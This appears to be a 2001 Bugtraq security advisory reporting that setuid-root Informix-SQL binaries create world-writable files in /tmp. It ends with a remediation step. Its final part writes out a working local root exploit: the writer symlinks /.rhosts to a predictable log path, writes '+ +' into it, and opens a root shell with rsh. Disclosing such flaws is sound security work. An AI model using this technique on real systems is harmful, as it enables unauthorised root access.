![[LWN Logo]](/images/lcorner.png) |
|
![[LWN.net]](/images/Included.png) |
From: s96192@ce.hannam.ac.kr
To: bugtraq@securityfocus.com
Subject: [ Hackerslab bug_paper ] Informix-SQL application vulnerability
Date: Tue, 4 Sep 2001 22:18:47 +0900 (KST)
==============================================================================
[ Hackerslab bug_paper ] Informix-SQL application vulnerability
==============================================================================
File : Informix-SQL application
SYSTEM : Systems running Informix
INFO :
There is a vulneribility in informix-SQL application which allows local
users to create any file with root privilege:
PART 1 :
$ id
uid=500 (informix) gid=120 (informix) groups=1000(loveyou)
$ umask 0000
$ cd ~informix/bin (Informix HOME Directory)
$ ./onshowaudit
INFORMIX-SQL Version 7.31.UC5
$ ls -al onbar_d ondblog onsmsync onsrvapd
-rwsr-sr-x 1 root informix 2234104 Nov 18 1999 onbar_d
-rwsr-sr-x 1 root informix 2219456 Nov 18 1999 ondblog
-rwsr-sr-x 1 root informix 2284972 Apr 10 2000 onsmsync
-rwsr-sr-x 1 root informix 39144 Nov 18 1999 onsrvapd
$ ./onbar_d or ./ondblog or ./onsmsync
$ ls -al /tmp/bar*
-rw-rw---- 1 root informix 557 Aug 29 17:26 /tmp/bar_act.log
-rw-rw---- 1 root informix 0 Aug 29 17:26 /tmp/bar_dbug.log
PART 2:
$ ./onsrvapd
$ ls -al /tmp/ons*
-rw-rw-rw- 1 root informix 141 Aug 29 17:38 /tmp/onsnmp.(hostname).log
-rw-rw-rw- 1 informix informix 319 Aug 29 17:38 /tmp/onsrvapd.log
PART 3:
$ ./snmpdm
$ ls -al /tmp/snmpd.log
-rwxrwxrwx 1 root root 1085 Aug 29 17:43 /tmp/snmpd.log
PART 4:
loveyou@dogfoot$ ln -s /.rhosts /tmp/onsbmp.dogfoot.log
loveyou@dogfoot$ ~informix/bin/onsrvapd &
loveyou@dogfoot$ ls -al /.rhosts
-rw-rw-rw- 1 root informix 141 Aug 29 18:28 /.rhosts
loveyou@dogfoot$ echo "+ +" > /.rhosts
loveyou@dogfoot$ rsh -l root localhost csh -i
# whoami
root
SOLUTION :
remove setuid permition, contact your vendor and get a patch.
$ su -
# cd ~informix/bin (Informix HOME Directory)
# chmod o-s onbar_d ondblog onsmsync onsrvapd
==-------------------------------------------------------------------------------==
********
* ** ** *
* ** ** *
* ****** * Kim Yong-Jun
* ** ** * loveyou@hackerslab.org
* ** ** * [ http://www.hackerslab.org ]
******** HACKERSLAB (C) since 1999
==-------------------------------------------------------------------------------==